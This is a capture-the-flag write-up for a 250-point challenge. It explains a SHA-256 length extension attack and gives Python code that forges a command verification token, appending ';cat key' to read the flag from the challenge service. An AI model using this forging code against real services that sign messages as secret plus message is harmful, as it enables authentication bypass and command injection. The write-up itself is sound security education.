What an awesome CTF. The “Size Doesn’t Matter” challenge read:
Size Doesn’t Matter [250] Password Guessing
We found a pair of robot command execution services running at ports 8888 and
- Can you break into it?
The first service, when poked, asked for a command and answered with the following:
Your verification string is valid for your command for 10 seconds: 60a33bc5e3be71846a60b2103e46cce3045e8380e04f9cd69e29c1c575284930
secret: XXXXXXXX
timecode: 12:32:3
command: ls
The second service requested something of the form (after an update of the challenge):
Please send command1;command2;command3::verification
One shall be enough. :-)
After playing a bit with it and seeing that the command input was stripped and filtered to only allow letters, we started fiddling with the token. Looks like SHA-256 in length, so assuming it is, it could be subject to a length extension attack.
Length extension attacks are basically a property of Merkle–Damgård construction. Think of it this way: a SHA-2 digest is essentially the internal function state after consuming the message, its padding (if any) plus the length in bits. If you wanted, you could grab it, initialize a SHA-2 implementation with it and the length of the processed message thus far, and continue hashing additional blocks. The end result is the digest of:
[ Initial message | 0x80 | Padding | Length | Concatenated message ]
Now as the commands were fed to bash by a Python script, concatenating a semicolon plus a
cat key
will presumably get us where we want. The good folks at
vnsecurity had already provided an implementation I modified.
So off we go,
#!/usr/bin/env python
import sha256 # PyPy's sha256 module works.
import struct
class shaext:
Performs SHA-256 length extension.
def __init__(self, origtext, keylen, origsig):
self.origtext = origtext
self.keylen = keylen
self.origsig = origsig
self.addtext = ''
def init(self):
count = (self.keylen + len(self.origtext)) * 8
index = (count >> 3) & 0x3FL
padLen = 120 - index
if index < 56:
padLen = 56 - index
padding = '\x80' + '\x00' * 63
self.input = self.origtext + padding[:padLen] + struct.pack('<Q', count)
count = (self.keylen + len(self.input)) * 8
self.impl = sha256.sha256()
self.impl._sha['count_lo'] = count
self.impl._sha['count_hi'] = 0
_digest = self.origsig.decode("hex")
self.impl._sha['digest'] = [x for x in struct.unpack("<IIIIIIII", _digest)]
def add(self, addtext):
self.addtext = self.addtext + addtext
def final(self):
new_sig = self.impl.hexdigest()
new_msg = self.input + self.addtext
return (new_msg, new_sig)
and then we fiddle with the two services, like so:
import socket, time
import shaext
while True:
sock_verifier = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
COMMAND = raw_input('cmd? ')
sock_verifier.send((COMMAND + '\x0a'))
verification = sock_verifier.recv(256)
token_begin = verification.find('seconds: ') + len('seconds: ')
token_end = verification.find('\x0a');
token = verification[token_begin : token_end]
timecode = verification[verification.find('timecode: ') + 10 : verification.find('timecode: ') + 17]
extension = shaext.shaext(COMMAND, 8 + len(timecode), token)
extension.add(';cat key')
(new_msg, new_token) = extension.final()
print('[+] New command: ' + new_msg)
print('[+] New token : ' + new_token)
command_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
command_sock.connect((IP, PORT2))
buf = new_msg + '::' + new_token + '\x0a'
data_rcv2 = command_sock.recv(4096)
Which nets us the key:
Future »my_hash_is_longer_than_your_hash